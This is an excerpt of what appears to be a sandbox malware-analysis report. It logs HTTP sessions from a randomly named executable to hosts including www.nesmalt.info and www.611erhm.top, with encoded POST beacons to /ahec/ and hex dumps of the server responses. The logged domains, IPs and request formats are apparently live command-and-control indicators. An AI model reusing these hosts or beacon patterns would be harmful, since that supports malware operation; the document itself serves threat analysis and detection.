2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
                                                                        Dec 2, 2023 18:50:42.226311922 CET1340INData Raw: 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33 2d 37 2e 35 20 31 36 2e 38 37 2d 31 33 2e 33
                                                                        Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
                                                                        Dec 2, 2023 18:50:42.226325035 CET1340INData Raw: 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 35 32 30 2e 33 39 63 2d 32 2e
                                                                        Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
                                                                        Dec 2, 2023 18:50:42.226340055 CET1340INData Raw: 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36 2d 31 31 2e 30 34 2d 31 30 2e 35 35 2d 31 35
                                                                        Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
                                                                        Dec 2, 2023 18:50:42.226483107 CET333INData Raw: 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20 20 20 20 20 3c 66 65 6d 65 72 67 65 3e 0a 20
                                                                        Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        24192.168.2.104973666.29.155.54805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:50:44.642169952 CET510OUTGET /ahec/?Ot=DTrGbTEHMG6Y4mKy1Dn1KlGSTxAaPAt5CR5S23I4xf5AWU1NMecScwq/Pr/mUgt4GFrPBjE4MJyXMuu59XRudeX+UPGmLlgOAA==&6d=QlZl HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.nesmalt.info
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:50:44.924726009 CET1340INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:50:44 GMT
                                                                        Server: Apache
                                                                        Content-Length: 5278
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-
                                                                        Dec 2, 2023 18:50:44.924746990 CET1340INData Raw: 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33
                                                                        Data Ascii: 23.58v-33.13c0-12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5
                                                                        Dec 2, 2023 18:50:44.924758911 CET1340INData Raw: 39 20 32 2e 30 33 20 31 2e 33 32 20 33 2e 37 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31
                                                                        Data Ascii: 9 2.03 1.32 3.75 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"
                                                                        Dec 2, 2023 18:50:44.924772024 CET1340INData Raw: 31 39 20 31 35 2e 32 37 20 33 2e 31 39 20 32 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36
                                                                        Data Ascii: 19 15.27 3.19 23.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.0
                                                                        Dec 2, 2023 18:50:44.924784899 CET348INData Raw: 75 73 73 69 61 6e 62 6c 75 72 20 63 6c 61 73 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20
                                                                        Data Ascii: ussianblur class="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        25192.168.2.104973734.149.198.43805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:50:51.165658951 CET783OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.611erhm.top
                                                                        Origin: http://www.611erhm.top
                                                                        Referer: http://www.611erhm.top/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 183
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 5a 61 38 52 52 54 6d 44 7a 45 41 5a 64 2b 4c 42 72 36 52 57 6c 73 7a 65 42 6e 62 35 71 67 76 38 33 4b 77 36 79 31 46 6b 78 34 56 6c 78 59 39 36 70 64 34 6a 45 72 49 4f 69 6e 54 6c 63 33 62 58 75 53 61 6e 42 48 6a 6a 45 58 2f 4a 35 43 4c 6a 32 73 75 59 4c 71 2f 30 42 75 66 30 57 76 47 35 4b 6c 57 49 63 56 33 6b 76 46 4e 59 32 72 50 39 4d 4f 2b 75 30 4d 46 69 58 68 4d 77 41 69 69 43 4f 77 61 51 6d 57 78 72 39 5a 69 39 35 68 66 35 7a 36 57 78 68 70 6e 44 33 6b 52 6c 31 4e 64 55 76 6b 61 2b 75 52 74 79 4f 62 45 44 7a 32 7a 4c 4b 77 3d 3d
                                                                        Data Ascii: Ot=Za8RRTmDzEAZd+LBr6RWlszeBnb5qgv83Kw6y1Fkx4VlxY96pd4jErIOinTlc3bXuSanBHjjEX/J5CLj2suYLq/0Buf0WvG5KlWIcV3kvFNY2rP9MO+u0MFiXhMwAiiCOwaQmWxr9Zi95hf5z6WxhpnD3kRl1NdUvka+uRtyObEDz2zLKw==
                                                                        Dec 2, 2023 18:50:51.452313900 CET230INHTTP/1.1 405 Method Not Allowed
                                                                        Server: nginx/1.20.2
                                                                        Date: Sat, 02 Dec 2023 17:50:51 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 157
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Dec 2, 2023 18:50:51.455029964 CET211INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        26192.168.2.104973834.149.198.43805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:50:53.795634985 CET803OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.611erhm.top
                                                                        Origin: http://www.611erhm.top
                                                                        Referer: http://www.611erhm.top/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 203
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 5a 61 38 52 52 54 6d 44 7a 45 41 5a 64 65 62 42 73 5a 70 57 6a 4d 7a 66 45 6e 62 35 6b 77 76 34 33 4b 38 36 79 30 42 30 78 4b 42 6c 77 34 4e 36 6f 5a 55 6a 48 72 49 4f 6f 48 53 68 45 58 61 62 75 53 65 5a 42 48 76 6a 45 58 72 4a 35 48 33 6a 32 2f 57 62 4c 36 2f 32 64 75 66 79 59 50 47 35 4b 6c 57 49 63 56 6a 4b 76 45 70 59 31 59 48 39 4f 76 2f 34 35 73 46 68 48 52 4d 77 57 53 69 47 4f 77 62 67 6d 56 30 4f 39 62 61 39 35 67 76 35 69 50 71 32 71 70 6e 46 37 30 51 54 30 4e 73 59 69 58 65 66 69 79 4e 53 63 4c 31 72 79 6a 66 59 4e 42 33 49 59 63 56 52 42 56 59 49 77 73 62 30 31 54 4c 6e 68 63 49 3d
                                                                        Data Ascii: Ot=Za8RRTmDzEAZdebBsZpWjMzfEnb5kwv43K86y0B0xKBlw4N6oZUjHrIOoHShEXabuSeZBHvjEXrJ5H3j2/WbL6/2dufyYPG5KlWIcVjKvEpY1YH9Ov/45sFhHRMwWSiGOwbgmV0O9ba95gv5iPq2qpnF70QT0NsYiXefiyNScL1ryjfYNB3IYcVRBVYIwsb01TLnhcI=
                                                                        Dec 2, 2023 18:50:54.082504034 CET230INHTTP/1.1 405 Method Not Allowed
                                                                        Server: nginx/1.20.2
                                                                        Date: Sat, 02 Dec 2023 17:50:53 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 157
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Dec 2, 2023 18:50:54.085484982 CET211INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        27192.168.2.104973934.149.198.43805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:50:56.421829939 CET1816OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.611erhm.top
                                                                        Origin: http://www.611erhm.top
                                                                        Referer: http://www.611erhm.top/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1215
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 5a 61 38 52 52 54 6d 44 7a 45 41 5a 64 65 62 42 73 5a 70 57 6a 4d 7a 66 45 6e 62 35 6b 77 76 34 33 4b 38 36 79 30 42 30 78 4b 5a 6c 78 4a 74 36 71 34 55 6a 47 72 49 4f 32 58 53 73 45 58 61 53 75 55 32 6a 42 48 54 7a 45 56 54 4a 34 6c 50 6a 68 2b 57 62 65 4b 2f 32 46 75 66 33 57 76 47 73 4b 68 36 4d 63 56 7a 4b 76 45 70 59 31 66 33 39 59 75 2f 34 71 63 46 69 58 68 4d 38 41 69 69 75 4f 77 53 59 6d 57 5a 37 39 72 36 39 34 41 2f 35 78 5a 2b 32 31 5a 6e 39 34 30 51 62 30 4e 68 61 69 52 36 74 69 79 49 33 63 4d 42 72 78 30 36 45 52 6a 33 4d 63 61 35 2b 4a 42 67 47 35 62 4f 4d 6d 6d 50 57 69 6f 45 39 52 6d 4f 43 2f 33 36 7a 4e 75 76 65 50 6f 63 68 54 30 55 46 36 58 63 49 6e 43 76 4b 35 79 48 4d 78 7a 32 53 51 32 54 70 62 4c 54 63 56 70 69 6e 5a 58 77 59 6d 77 2b 58 52 6d 46 56 56 34 43 4c 38 35 45 64 4b 37 34 66 54 67 66 65 73 2b 4c 72 43 5a 68 52 6f 73 68 75 5a 53 33 5a 56 7a 64 2f 7a 30 76 2b 31 34 58 36 48 45 4e 65 6e 7a 47 38 56 72 74 55 44 63 43 72 79 44 70 43 52 50 62 75 34 49 6f 70 39 30 4e 49 4f 6f 4a 58 6b 69 50 34 46 6f 46 2f 61 66 49 59 51 2f 70 4c 44 38 36 36 49 44 30 4e 39 7a 79 2b 4c 4b 34 79 7a 58 5a 76 72 59 61 4f 33 6b 6a 37 69 30 43 54 39 44 6f 6c 54 77 4d 4d 65 37 49 54 34 6f 33 74 6d 30 36 43 61 31 41 31 5a 74 45 74 45 4d 4e 33 76 4b 6b 62 72 4d 36 33 4b 65 67 63 6b 4b 61 6c 75 56 53 44 2b 34 6f 6b 6c 6c 75 43 37 59 30 66 68 77 2b 5a 4e 4d 4e 53 50 65 42 6a 48 67 75 64 51 65 57 68 36 7a 39 6d 35 32 64 69 44 61 35 6d 51 34 4f 30 2b 41 38 73 61 6a 31 6b 48 42 31 6c 47 59 67 4b 44 70 70 53 4f 4b 33 53 31 63 51 46 63 4a 50 50 69 72 6b 38 70 4e 4a 67 66 48 48 63 75 6e 64 6d 65 31 39 44 6e 30 30 34 6e 33 72 49 67 45 6b 79 53 2b 50 48 70 4b 74 6a 37 49 79 69 33 4a 32 45 57 6f 78 78 70 70 41 50 69 4c 61 52 48 6d 55 70 72 54 53 37 54 4e 2b 74 44 51 63 78 6a 51 54 51 38 52 6a 65 53 5a 52 70 53 67 5a 74 56 53 41 79 4e 78 68 52 30 41 75 53 31 43 58 48 43 4b 35 46 73 6a 46 77 50 4c 36 58 74 74 62 59 47 63 6d 57 6a 71 71 57 35 4d 78 36 37 57 6f 2f 45 59 70 5a 36 61 4a 42 5a 66 33 67 73 32 4b 51 59 4e 30 6f 4b 6e 50 73 75 50 66 35 46 6f 4d 67 63 35 53 41 4b 70 78 74 43 72 73 52 69 6e 38 34 72 54 54 7a 4c 7a 61 37 32 43 71 58 6c 69 6a 4a 36 72 52 50 45 50 4d 4b 31 79 61 4a 79 36 54 35 69 34 